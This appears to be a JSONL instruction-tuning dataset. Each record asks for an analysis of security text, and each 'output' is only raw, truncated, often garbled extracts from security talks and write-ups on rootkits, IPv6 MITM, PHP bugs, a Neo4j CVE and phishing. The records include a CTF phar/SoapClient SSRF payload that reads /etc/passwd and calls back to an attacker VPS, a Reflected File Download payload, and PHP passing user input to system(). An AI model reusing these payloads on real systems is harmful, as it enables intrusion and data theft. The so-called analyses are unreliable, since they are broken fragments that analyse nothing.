{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConsumer Automotive Technology Retail Life Sciences & Healthcare Energy & Chemicals Uroburos Paul Rascagneres Senior Threat Researcher GDATA SecurityLabs Page Uroburos | HITCON | August 2014 Uroburos is a rookit revealed to the public by G DATA in February 2014. The purpose of the rootkit is to maintain remote access to the infected machine and steal sensitive data. Here are the features of this rootkit: - use of function hooking, to hide its activities - Deep Packet Inspection (DPI), to monitor the network - bypass kernel protection, to load and execute the driver - use of virtual file system, to store configuration and data -  2 Uroburos rootkit Page Uroburos | HITCON | August 2014 Uroburos name Uroburos is a direct reference to the Greek word Ouroboros (Οὐροβόρος). The Ouroboros is an ancient symbol depicting a serpent or dragon eating its own tail. 3 Uroburos rootkit Page Uroburos | HITCON | August 2014 Rootkit composition The rootkit is composed of two files: - .sys file (the Microsoft Windows driver 32/64 bits) - .dat file (the encrypted virtual file system) 4 Uroburos rootkit Page Uroburos | HITCON | August 2014 The driver The loaded driver: 5 Uroburos rootkit Page Uroburos | HITCON | August 2014 The driver The loaded driver: 6 Uroburos rootkit Page Uroburos | HITCON | August 2014 The driver The loaded driver: 7 Uroburos rootkit Page Uroburos | HITCON | August 2014 Hooking To hide its activity and its presence, the driver sets several hooks by modifying the beginning of the function with an interrupt (0x3C): kd> ? IoCreateDevice Evaluate expression: -2103684120 = 829c53e8 kd> u 829c53e8 nt!IoCreateDevice: 829c53e8 6a01 push 1 829c53ea cdc3 int 0C3h 829c53ec ec in al,dx 829c53ed 83e4f8 and esp,0FFFFFFF8h 829c53f0 81ec94000000 sub esp,94h 829c53f6 a14cda9282 mov eax,dword ptr [nt!__security_cookie (8292da4c)] 829c53fb 33c4 xor eax,esp 829c53fd 89842490000000 mov dword ptr [esp+90h],eax 8 Uroburos rootkit Page Uroburos | HITCON | August 2014 Hooking The Interrup", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIoT 自动化安全平台体系建设 我是谁从哪里来要做什么 l 我叫孟卓IDFengGou l 来自小米 AIoT 安全实验室 l 保障米系智能产品的安全赋能业务 团队任务如何达成 l 消消除隐患 l 防防患于未燃 l 员人员的成长 消除隐患 技术栈复杂 技术难 人才缺失 团队难 产品量激增 压力大 行业经验 无体系 面临严峻挑战 初步尝试 AIoT 消费级物联网产品安全基线 团队能力交叉 误入歧途 - 实验室变流水线工厂 二向箔 IoT自动化审计 的突破 业务构成 -- 抽丝剥茧 芯片 应用 模块 IPC 通信 用户 APP IoT 智能联动 I2X 二维化 芯片接口 以太流量 无线流量 设备服务 控制协议 固件分析 源码分析 日志行为 接口Fuzz APP Hook 云服务 攻击链组合 局域网 互联网 本地环回 无认证 弱认证 强认证 认证泄漏 认证绕过 认证劫持 RCE 信息泄露 拒绝服务 TARGET : MQTT RESULT : HIGH * 数据分析攻击链路分布 全天候自动化闭环 发现 方案 复查 关闭 学习 修完漏洞就安全了 这是一个巨大的误区安全是动态的随 着技术的迭代品类的多样化开发者的 交替供应的风险以及用户要求的提升 很难找到一个基点来说明产品的安全 赋能生态 小米 生态 链 三方 业务 合作 防患于未燃 产品构成  硬件/芯片  传感模块  操作系统  依赖库/开源代码  链路协议栈 不可控  应用协议栈/SDK  服务代码/APP  云服务  账号体系 可控 小米战场 AIoT 车联网 / 自动驾驶 机器人 / 工业控制 手机 / 电视 / 笔记本 人无远虑 必有近忧 论语", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHi! Im DOMAIN\\Steve, please let me access VLAN2. Tricking firewall user identity capabilities into applying security policies to arbitrary IPs on the network. Get-ADUser \"Justin Perdok\" @JustinPerdok on Twitter Into hacking and automating stuff Pentester at Orange Cyberdefense Enjoys craft beers and longboarding Outline The Tool The Story The Solution The Takeaways The Pwn Storytime The Story Storytime Storytime Storytime The dangers of Client Probing on Palo Alto Firewalls (Estaban Rodriguez @ Coalfire) The risk of Authenticated Vulnerability Scans (Xavier Mertens @ SANS) Palo Alto Credential Exposure (HD Moore @ Project Sonar) 2019 2014 2018 Storytime 1 2 3 Named pipes Named pipes Traditional segmentation The Solution Traditional segmentation Traditional segmentation Traditional segmentation untagged VLAN2 untagged VLAN1 Traditional segmentation Traditional segmentation Tagged VLAN 1, 2 Tagged VLAN 1, 2 Untagged ports Untagged Ports Step through Traditional segmentation Traditional segmentation *Overdramatic example Exploring $Vendor1 Active Directory authentication logs Syslog servers And more! Client Probing Exploring $Vendor1 Exploring $Vendor1 The sysadmin in me Exploring $Vendor1 The hacker in me Exploring $Vendor1 Client Probing Exploring $Vendor1 Client Probing Exploring $Vendor1 Client Probing I'd like access to the VIP fridge pls. My hotel room number is (192.168.56.)148. (ping vip-fridge.tld) Exploring $Vendor1 Client Probing Ahh, room 148. Our system doesn't know who's currently checked into this room. What is your name sir ? (NetWkstaUserEnum Request) Exploring $Vendor1 Client Probing My name is Justin. (NetWkstaUserEnum Response) Exploring $Vendor1 Client Probing Hi, Mr. Perdok. Sorry, you are not allowed to access the VIP fridge due our hotel policy. VIP clients only. Exploring $Vendor1 Oversight of Client Probing ? Steve ! Exploring $Vendor1 Oversight of Client Probing ? I'd like access to the VIP fridge pls. My hotel room number is (192.168.56.)149", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndmesg === 显示Linux系统启动信息 ## 补充说明 **dmesg命令** 被用于检查和控制内核的环形缓冲区kernel会将开机信息存储在ring buffer中您若是开机时来不及查看信息可利用dmesg来查看开机信息保存在`/var/log/dmesg`文件里 ### 语法 ```shell dmesg(选项) ``` ### 选项 ```shell -c显示信息后清除ring buffer中的内容 -s<缓冲区大小>预设置为8196刚好等于ring buffer的大小 -n设置记录信息的层级 ``` ### 实例 ```shell [root@localhost ~]# dmesg | head Linux version 2.6.18-348.6.1.el5 (mockbuild@builder17.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Tue May 21 15:34:22 EDT 2013 BIOS-provided physical RAM map: BIOS-e820: 0000000000010000 - 000000000009f400 (usable) BIOS-e820: 000000000009f400 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000007f590000 (usable) BIOS-e820: 000000007f590000 - 000000007f5e3000 (ACPI NVS) BIOS-e820: 000000007f5e3000 - 000000007f5f0000 (ACPI data) BIOS-e820: 000000007f5f0000 - 000000007f600000 (reserved) BIOS-e820: 00000000e0000000 - 00000000e8000000 (reserved) ``` 查看硬盘基础信息 ```shell dmesg | grep sda [ 2.442555] sd 0:0:0:0: [sda] 488281250 512-byte logical blocks: (250 GB/232 GiB) [ 2.442590] sd 0:0:0:0: [sda] Write Protect is off [ 2.442592] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 [ 2.442607] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA [ 2.447533] sda: sda1 [ 2.448503] sd 0:0:0:0: [sda] Attached SCSI disk ``` 查看多关键字 ```shell dmesg | grep -E \"vcc5v0_host|vcc_3v3_s0|ttyS\" [ 1.193143] vcc5v0_host: supplied by vcc5v0_usb [ 1.481139] feb80000.serial: ttyS5 at MMIO 0xfeb80000 (irq = 73, base_baud = 1500000) is a 16550A [ 1.513541] vcc_3v3_s0: supplied by vcc5v0_sys ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原文 by 瞌睡龙 ## 一验证过滤用户的输入 即使是最普通的字母数字输入也可能是危险的列举几个容易引起安全问题的字符 ! $  & * ( ) ~ [ ] \\ | { } ' \" ; < > ? - ` 在数据库中可能有特殊意义的字符 ' \" ; \\ 还有一些非打印字符 字符\\x00或者说ASCII 0NULL或FALSE 字符\\x10和\\x13或者说ASCII 10和13\\n \\r 字符\\x1a或者说ASCII 26表示文件的结束 输入错误的参数类型也可能导致程序出现意想不到的错误 输入过多的参数值可能导致溢出等错误 ## 二PHP中验证用户的输入 这里特别要注意php.ini中的register_globals的设定在早期的php版本中是默认开启的这会导致很严重的安全问题 ``` php <?php // set admin flag if ($auth->isAdmin()) { $admin = TRUE; } // ... if ($admin) { // do administrative tasks } ?> ``` 上面这段代码看起来是安全的但是如果register_globals开启了的话在访问的url中加入`?admin=1`即可绕过前半部分的逻辑判断 更安全的代码应该给$admin赋默认FALSE值 ``` php <?php // create then set admin flag $admin = FALSE; if ($auth->isAdmin()) { $admin = TRUE; } // ... if ($admin) { // do administrative tasks } ?> ``` 早期人们开发调试的时候发现使用register_globals有极大的便利所以早期的php版本中默认开启但是随着越来越多的安全问题从php 4.2.0开始register_globals变为了默认关闭当你发现register_globals是on的时候你可能会在脚本当中加入如下代码使其关闭 `ini_set('register_globals', 0);` 但实际上当所有的全局变量已经创建了之后以上代码并不会起到作用但是你可以在文档的根目录下的.htaccess的文件中加上下面这一行 `php_flag register_globals 0` 变量声明强烈建议总是事先声明变量 检查输入的类型长度和格式 字符串检查在PHP中字符串几乎可以是任何事情但有些值并不是严格的字符串类型可以用is_string()函数来确定 有些时候你不介意数字作为字符串可以用empty()函数 数字类型检查使用is_int()函数或者is_integer()或is_long()例如 ``` php $year = $_POST['year']; if (!is_int($year)) exit(\"$year is an invalid value for year!\"); ``` 也可以使用gettype()函数判断类型后做处理 ``` php if (gettype($year) != 'integer') { exit(\"$year is an invalid value for year!\"); } ``` 至少还有三种方式可以吧$year变量转变为整数 ``` php $year = intval($_POST['year']); $year = ( int ) $_POST['year']; if (!settype($year, 'integer')) {exit(\"$year is an invalid value for year!\");} ``` 如果允许浮点型与零的值可以使用is_numeric()函数来做判断 判断一个值是否为布尔型的时候使用is_bool()函数 下表是对各种类型变量使用各函数判断的结果 ![phpsec1](../pictures/phpsec1.jpg) 检查字符串的长度使用strlen()变量 ``` php if (strlen($year) != 4) exit(\"$year is an invalid value for year!\"); ``` 概括总结一下PHP中类型长度格式等验证 ``` php <?php // set up array of expected values and types $expected = array( 'carModel' => 'string', 'year' => 'int', 'imageLocation' => 'filename' ); // check each input value for type and lengt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/3/28 10:36 PHP filter_var 恶作剧 :: pwning.systems https://pwning.systems/posts/php_filter_var_shenanigans/ 1/7 222326 乔迪佐默 很可能我们都过可以防我们遇到漏洞的 PHP 过滤器在这篇博中我将通过在过滤器本 身中查找错误以找到错误来引导您完成绕过过滤器的思考过程 假设我们有以下代码它将些户输传递给 filter_var() 并使 FILTER_VALIDATE_DOMAIN or FILTER FLAG HOSTNAME 标志这增加了根据每个主机原理 验证主机名的功能这意味着它们必须以字数字字符开头并且在整个度中必须仅包含字 数字或连字符成功完成此检查后户输将在系统命令中使因此可能会引命令注 漏洞成的代码将类似于以下内容 通常在这种情况下不可能触发此命令注因为我们户的输只能包含字数字字符或连字 符所以在这种情况下是完全安全的 然底层代码很容易受到攻击当我们详细检查它以了解 FILTER_VALIDATE_DOMAIN 函数 如何与 FILTER_FLAG_HOSTNAME 标志起作时我们将看到这点让我们来看看它是如 何作的 PHP filter_var 恶作剧 # PHP # filter_var #绕过 <?php $userinput = \"YOUR_USER_INPUT\"; $command = \"ping -c5 \"; if (filter_var($userinput, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME { system($command . $userinput, $retval); } ?> 2022/3/28 10:36 PHP filter_var 恶作剧 :: pwning.systems https://pwning.systems/posts/php_filter_var_shenanigans/ 2/7 旦我们 filter_var()  FILTER_VALIDATE_DOMAIN 标志调函数 php_filter_validate_domain() 就会被执让我们仔细看看这意味着什么 本质上它的作是获取指向 $userinput 变量值的指针并将其作为第个参数 _php_filter_validate_domain 传递给 并将 的输出 strlen($userinput) 作为第 个参数传递给同个函数需要注意的是 strlen() 在这种情况下该函数返回个符号 整数 现在让我们看下 _php_filter_validate_domain . 在这种情况下该函数的第个参数是 int len 这表明它是个有符号整数我们将 的 输出作为第个参数传递给 strlen 它这表明它是个符号整数 size_t 你看到 我要去哪了吗 为了理解这点我们必须先了解整数是如何起作的对于数值变量它们可以是有符号的 也可以是符号的这取决于它们表示正数和负数的能有符号变量和符号变量的区别在 于有符号变量既可以表示正数也可以表示负数符号变量只能表示负数 例如如果我们假设体系结构是 32 位那么由于它是符号的符号整数的值的范围可以 从 0 to 4294967295 到但由于它是有符号的int 的值只能在从 -2147483648 to的范 围内 2147483648 结果是任何于的值 2147483647 都会导致传递给函数的负数 但是如果我们检查该 _php_filter_validate_domain 函数我们会注意到该变量 l 的类 型为 size_t 并且该值 len 已分配给该变量 void php_filter_validate_domain(PHP_INPUT_FILTER_PARAM_DECL) /* {{{ */ { if (!_php_filter_validate_domain(Z_STRVAL_P(value), Z_STRLEN_P(value RETURN_VALIDATION_FAILED } } /* }}} */ static int _php_filter_validate_domain(char * domain, int len, zend_l 2022/3/28 10:36 PHP filter_var 恶作剧 :: pwning.systems https://pwning.systems/posts/php_filter_var_shenanigans/ 3/7 该函数将 len 其作为 int 有符号然后将其分配 l 给 size_t . 这在上得到了证 明如果我们传递个度很的字符串例如 4294967296 那", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFear the Evil FOCA Attacking Internet Connections with IPv6 Chema Alonso @chemaAlonso chema@11paths.com Spain is different Spain is different Spain is different Spain is different ipconfig IPv6 is on your box! And it works!: route print And it works!: ping And it works!: ping LLMNR ICMPv6 (NDP)  No ARP  No ARP Spoofing  Tools anti-ARP Spoofing are useless  Neighbor Discovery Protocol uses ICPMv6  NS: Neighbor Solicitation  NA: Neighbor Advertisement And it works!: Neightbors NS/NA Level 1: Mitm with NA Spoofing NA Spoofing NA Spoofing Demo 1: Mitm using NA Spoofing and capturng SMB files Spaniards! Step 1: Evil FOCA Step 2: Connect to SMB Server Step 3: Wireshark Step 4: Follow TCP Stream LEVEL 2: SLAAC Attack ICMPv6: SLAAC  Stateless Address Auto Configuration  Devices ask for routers  Routers public their IPv6 Address  Devices auto-configure IPv6 and Gateway  RS: Router Solicitation  RA: Router Advertisement Rogue DHCPv6 DNS Autodiscovery And it works!: Web Browser Not in all Web Browsers Windows Behavior  IPv4 & IPv6 (both fully configured)  DNSv4 queries A & AAAA  IPv6 Only (IPv4 not fully configured)  DNSv6 queries A  IPv6 & IPv4 Local Link  DNSv6 queries AAAA From A to AAAA DNS64 & NAT64 Demo 2: 8ttp colon SLAAC SLAAC Step 1: No AAAA record Step 2: IPv4 not fully conf. DHCP attack Step 3: Evil FOCA SLAAC Attack Step 4: Victim has Internet over IPv6 Level 3: WPAD attack in IPv6 WebProxy AutoDiscovery  Automatic configuation of Web Proxy Servers  Web Browsers search for WPAD DNS record  Connect to Server and download WPAD.pac  Configure HTTP connections through Proxy WPAD Attack  Evil FOCA configures DNS Answers for WPAD  Configures a Rogue Proxy Server listening in IPv6 network  Re-route all HTTP (IPv6) connections to Internet (IPv4) Demo 3: WPAD IPv6 Attack Step 1: Victim searhs for WPAD A record using LLMNR Step 2: Evil FOCA answers with AAAA Step 3: Vitim asks (then) for WPAD AAAA Record using LLMNR Step 4: Evil FOCA confirms WPAD IPv6 address Step 5: Victim", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTeal Rogers and Alejandro Caceres  Teal has experience with 3D visualizations and organizing massive amounts of data.  Alex has a background in distributed computing, network reconnaissance, and vulnerability detection.  The internet contains a massive amount of data that is extremely interconnected, however we lack any good solutions for visualizing these connections. Classical approaches to showing that much data just dont work. You either have to eliminate too much data or else allow everything to become too confusing.  This is where 3D comes in. By organizing our data in 3D we finally have a platform for displaying the invisible structure of the web. Now that we finally have a way to structure the web visually and intuitively, we can start adding data to that picture. For instance by allowing everyone (everyone who uses our software at least) to see just how many sites are riddled with security vulnerabilities.  I have been analyzing the security of sites on the internet for some time now. Most websites on the Internet are a complete mess. My PunkSPIDER project discovered this when I unleashed my distributed fuzzer on the entire Internet and started cataloging the results.  The first thing we needed to do was what Google already did so well -- collect links on the Internet and keep our index up to date. One of our requirements was that this metadata include extensive information on the vulnerabilities of a website. In order to find this, we are performing thorough, but minimally invasive, application- level vulnerability scanning against every site we crawl.  We are leveraging the open-source and free Apache Nutch project along with some custom built Nutch plugins to help us out with this. Nutch is an extremely powerful Hadoop cluster-based distributed web spider.  We built a custom, distributed web application fuzzer to find vulnerabilities as fast as we can spider. By using Alexs experience in building high-speed, distributed web app fuzzers (see PunkSPIDER) w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Reflected File Download (RFD) ## Introduction Reflected File Download (RFD) is web based attack that extends reflected attacks beyond the context of the web browser. Attackers can build malicious URLs which once accessed, download files, and store them with any desired extension, giving a new malicious meaning to reflected input, even if it is properly escaped. ## Where to find You can detect Reflected File Download (RFD) everywhere but there are 2 things that need to be looked up. - Finding reflected input (For example: JSONP Callback) - We can control the filename (there are several requirements that must be met) - Make sure that the `Content-Disposition` header does not include the `filename` attribute. ``` Content-Disposition: attachment; ``` - If there isn't any `Content-Disposition` header, you can use download attributes in the `<a>` tag. For example, like this: ``` <a download href=\"https://example/api/?id=1&outputtype=json&callback=||calc||\">Press Here</a> ``` ## How to exploit 1. Basic payload ``` http://example.com/api;/evil.bat;?callback=||calc|| ``` \"The browser will download the `evil.bat` file, and if you open the `.bat` file, the calculator will pop up. ## References * [Paper: Reflected File Download a New Web Attack Vector](https://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view?resourcekey=0-NV7cTUTB48bltMEddlULLg) * [Reflected File Download(RFD) Vulnerability. What? How?](https://medium.com/@Johne_Jacob/rfd-reflected-file-download-what-how-6d0e6fdbe331)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n宝塔板 7.6.0 基于python3+flask 录在 /www/server/panel/ config task.json 定时任务信息 menu.json 路由配置信息 { \"JOBS\": [ { \"id\": \"1\", \"func\": \"jobs:control_task\", \"args\": null, \"trigger\": \"interval\", \"seconds\": 15 }, { \"id\": \"2\", \"func\": \"jobs:install_task\", \"args\": null, \"trigger\": \"interval\", \"seconds\": 10 }, { \"id\": \"3\", \"func\": \"jobs:site_end_task\", \"args\": null, \"trigger\": \"interval\", \"seconds\": 10800 }, { \"id\": \"4\", \"func\": \"jobs:php_safe_task\", \"args\": null, \"trigger\": \"interval\", \"seconds\": 30 } ], \"control\": { \"open\": true, \"day\": 30 } } [ { \"title\": \"\", \"href\": \"/\", \"class\": \"menu_home\", \"id\": \"memuA\", \"sort\": 1 }, { \"title\": \"站\", \"href\": \"/site\", \"class\": \"menu_web\", \"id\": \"memuAsite\", \"sort\": 2 }, { \"title\": \"FTP\", \"href\": \"/ftp\", \"class\": \"menu_ftp\", \"id\": \"memuAftp\", \"sort\": 3 }, { \"title\": \"数据库\", \"href\": \"/database\", \"class\": \"menu_data\", \"id\": \"memuAdatabase\", \"sort\": 4 }, { \"title\": \"监控\", \"href\": \"/control\", \"class\": \"menu_control\", \"id\": \"memuAcontrol\", \"sort\": 5 }, { \"title\": \"安全\", \"href\": \"/firewall\", \"class\": \"menu_firewall\", \"id\": \"memuAfirewall\", \"sort\": 6 }, { \"title\": \"防墙\", \"href\": \"/btwaf/index\", \"class\": \"menu_btwaf\", \"id\": \"memu_btwaf\", \"sort\": 7 api.json 的api信息 ssh_info }, { \"title\": \"件\", \"href\": \"/files\", \"class\": \"menu_folder\", \"id\": \"memuAfiles\", \"sort\": 8 }, { \"title\": \"终端\", \"href\": \"/xterm\", \"class\": \"menu_xterm\", \"id\": \"memuAxterm\", \"sort\": 9 }, { \"title\": \"计划任务\", \"href\": \"/crontab\", \"class\": \"menu_day\", \"id\": \"memuAcrontab\", \"sort\": 10 }, { \"title\": \"软件商店\", \"href\": \"/soft\", \"class\": \"menu_soft\", \"id\": \"memuAsoft\", \"sort\": 11 }, { \"title\": \"板设置\", \"href\": \"/config\", \"class\": \"menu_set\", \"id\": \"memuAconfig\", \"sort\": 12 }, { \"title\": \"退出\", \"href\": \"/login?dologin=True\", \"class\": \"menu_exit\", \"id\": \"dologin\", \"sort\": 13 } ] 可能存放ssh信息 basic_auth.json 如果要basic登陆写这个件 flask 的key是12位成代码根据硬件来,每个机器唯 检查登陆 宝塔板在发现ua有bot时候会跳转到bt官 宝塔会先检测是否api check(检测config/api.json件)如果没有则跳转login 获取客户端IP直接从remote_addr 爆破的话有20次限制1时 token需要正确 app.secret_key = uuid.UUID(int=uuid.getnode", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSUCTF-WP-Nu1L SUCTF-WP-Nu1L upload Cocktail's Remix hardCpp BabyStack rev easy sql sudrv playfmt Checkin EasyPHP Prime RSA MT babyunic guess_game protocol Game Pythonginx DSA Akira Homework Signin upload Status: solved Tags: Web ssrf compress.zip if(preg_match('/(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib |rar|ogg|expect)(.|\\\\s)*|(.|\\\\s)*(file|data|\\.\\.) (.|\\\\s)*/i',$_POST['url'])){ die(\"Go away!\"); }else{ 1 2 3 lcoa 1 : finfo_file phar SoapClient __call ssrf admin.php <? __HALT_COMPILER();?> php://filter/convert.base64- encode/resource=phar:///var/www/html/upload/c1d22f060f3dc7cb23f8942369b1c7b9/322c f5eb582a2b2d427a3c8f1e606351.gif payload <?php $target = \"http://localhost/admin.php\"; $post_string = 'admin=1&ip=yourvps&port=8012&clazz=finfo&func1=file&func2=file&func3=file &arg1=/etc/passwd&arg2=/etc/passwd&arg3=/etc/passwd&xx=123'; $headers = array( 'X-Forwarded-For: 127.0.0.1', 'Cookie: xxxx=1234' ); $b = array(null,array('location' => $target,'user_agent'=>\"wupco\\r\\nContent-Type: application/x-www-form- urlencoded\\r\\n\".join(\"\\r\\n\",$headers).\"\\r\\nContent-Length: \". (string)strlen($post_string).\"\\r\\n\\r\\n\".$post_string,'uri' => \"aaab\")); class File{ public $file_name; public $type; public $func; public function __construct() { global $b; $this->func = \"SoapClient\"; $this->file_name = $b; $this->type = \"123\"; } } $aaa = new File(); @unlink(\"phar.phar\"); $phar = new Phar(\"phar.phar\"); //phar $phar->startBuffering(); $phar->setStub(\"GIF89aphp __HALT_COMPILER(); ?>\"); //stub $phar->setMetadata($aaa); //meta-datamanifest 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 Cocktail's Remix Status: solved Tags: Web http://47.111.59.243:9016/info.php download.php config.php http://47.111.59.243:9016/download.php?filename=/usr/lib/apache2/modules/mod_cocktail.so $phar->addFromString(\"test.txt\", \"test\"); // // $phar->stopBuffering(); rename(\"phar.phar\", \"/Users/smi1e/Desktop/test.gif\") ?> 28 29 30 31 32 <?php $filename = $_GET['filename']; h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSharepoint Knowledge Network A component of Microsoft Office Sharepoint Server 2007 (MOSS ) Total Information Awareness Not just for the government anymore KN is about connecting people KN is enterprise social networking KN enables users to collaborate KN automates the discovery and sharing of undocumented knowledge and relationships. KN helps discover Who knows whom? (Connectors) KN helps discover Who knows what? (Expertise Location) KN is an automated tool, to discover expertise within an organization. It is not meant to discover the experts, since they are already well known. It is mean to discover hidden gems of expertise on any topic. Organically discover expertise to enable an organization to make better choices quicker Microsoft is created KN based on three core beliefs:  * Most information is undocumented  * Its difficult to connect to the right person  * Weak ties deliver significant value The Knowledge Network solution is split into a client and a server that work together to  (Client) Analyze email to create profile (keywords, contacts, external contacts)  (Client) Publish profile to server (incremental updates)  (Seeker) Aggregate profiles (expertise information, social network)  (Seeker) Search for people (who know who? Who knows what?) Data Sources for KN Email Team sites Web IM Contacts Contact lists Portaits My Sites AD Relationships Distribution list Correlation Store Relationship data sources are inputs for the KN Correlation Store, which is surfaced through the browser. The Correlation Store is also accessible to line-of- business applications via APIs and an SDK. Useful software Microsoft understands that there may be privacy concerns involving KN. (WOW) Addresses these concerns involves striking the right balance among utility, simplicity and privacy. Utility is how useful will this software be to me? Simplicity is how easy will this software be to install, upload, maintain and use? Privacy is how much personal information will this software reveal an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Neo4j Shell Server 反序列化漏洞CVE-2021-34371 Neo4j是一个开源图数据库管理系统 在Neo4j 3.4.18及以前如果开启了Neo4j Shell接口攻击者将可以通过RMI协议以未授权的身份调用任意方法其中`setSessionVariable`方法存在反序列化漏洞因为这个漏洞并非RMI反序列化所以不受到Java版本的影响 在Neo4j 3.5及之后的版本Neo4j Shell被Cyber Shell替代 参考链接 - https://www.exploit-db.com/exploits/50170 - https://github.com/mozilla/rhino/issues/520 ## 漏洞环境 如果你使用Linux或OSX系统可以执行如下命令启动一个Neo4j 3.4.18 ``` TARGET_IP=<your-ip> docker compose up -d ``` 其中环境变量`TARGET_IP`需要制定靶场环境的IP地址 如果你是Windows系统请直接修改`docker-compose.yml`指定`TARGET_IP`环境变量的值 服务启动后访问`http://your-ip:7474`即可查看到Web管理页面但我们需要攻击的是其1337端口这个端口是Neo4j Shell端口使用RMI协议通信 ## 漏洞复现 使用[参考链接](https://www.exploit-db.com/exploits/50170)中的Java RMI客户端集成基于Rhino的[Gadget](rhino_gadget/)发送RMI请求 ![](1.png) 可见`touch /tmp/success5`已成功执行 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPHISHING WITHOUT FAILURE AND FRUSTRATION or How I learned to stop worrying and love the layer 8 Unabridged Version Jay Beale CTO, InGuardians 1 Larry Pesce Director of Research, InGuardians \"\"\"  As white hats, phishing should be just as easy as for black hats, right?  Write a crafty e-mail that directs readers to a web site.  Build a one-form web site to collect credentials.  Get client approval of the product of steps 1 and 2.  Send e-mail to as many people as possible at company.  Watch the passwords fly in.  Sometimes you get lucky and it really is this easy. Whew!  Expect 1040% of employees to give their passwords. Why isn't this simple? 2 \"\"\"  Larry once had a phishing campaign with a success rate in excess of 100%.  The company targeted a subset of its employees.  His \"give us passwords or we cut off your access\" call to action worked really well.  They forwarded the phishing e-mail to their co-workers!  Oh, and tested the privilege-separated accounts.  All of them Success Rates in Excess of 100% 3 \"\"\"  A professional phishing engagement should \"harden\" an organization's staff.  More specifically:  increase individual resilience in every staff member.  train the organization in collaborative detection.  After a couple phishing campaigns, employees will detect scams and report at higher percentages. Why Phish? 4 \"\"\"  Most peoples first few professional attempts dont go this well.  Years ago, when we started phishing, we'd watch our consultants get so frustrated with the situation. We got better.  The rest of this talk details ours and others' frustrating situations, teaching you how to avoid them entirely and achieve success. Why this talk? 5 Layer 8 \"\"\"  This isnt about red team phishing - we do that too, but it rarely involves these challenges.  Eleven stories of failure, each with specific solutions.  Generalizing  Setting up any professional phishing campaign involves:  Collaboration  Communication  Negotiation  For that matter, anything in life with more t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHID CARD TECHNOLOGIES HID CARD SERVICES CARD APPLICATIONS proximity (read/write contactless smart chip) magnetic stripe contact smart chip multi-technology cards Wiegand Swipe custom configuration complete cards personalization anti-counterfeiting card management custom artwork photo ID badging programming encoding access control IT secure authentication digital cash & vending biometric template storage time & attendance photo ID badging parking control medical records fare collection data storage CARD? INSIDE your Credential Reference Guide  Whats ALL THIN CARDS ARE ISO 7810 COMPLIANT. *ISO 7816 compliant for embedding optional contact smart chip module. Dimensions shown are nominal dimensions. Some custom graphics can increase overall card thickness. HID credentials feature a Lifetime Warranty. See HIDs Sales Policy for complete warranty details. Specifications subject to change without notice. Please consult our website, www.HIDCorp.com, for up- to-date specifications. See our How To Order Guide for details regarding options and part numbers. Need more than just access control? Leverage your A FULL LINE OF MULTI-TECHNOLOGY ISOPROX II Base part number: 1386 125 kHz proximity card SMART ISOPROX II Base part number: 1397 125 kHz proximity card, contact smart chip embeddable* (optional magnetic stripe) HID PROXIMITY AND MIFARE Base part number: 1431 125 kHz proximity card and 13.56 MHz MIFARE card (optional magnetic stripe) DUOPROX II Base part number: 1336 125 kHz proximity card with magnetic stripe SMART PROXIMITY AND MIFARE Base part number: 1431 125 kHz proximity and 13.56 MHz MIFARE card, contact smart chip embeddable* (optional magnetic stripe) 2.125\" (5.4cm) 3.370\" (8.6cm) 0.030\" - 0.033\" (0.076 - 0.083 cm) (optional) 2.125\" (5.4cm) 3.370\" (8.6cm) 0.030\" - 0.033\" (0.076 - 0.083 cm) (optional) 2.125\" (5.4cm) 3.370\" (8.6cm) 0.030\" - 0.033\" (0.076 - 0.083 cm) (optional) SMART DUOPROX II Base part number: 1398 125 kHz proximity card with magnetic stripe, contact s", "category": "text_analysis", "source": "security_papers"}
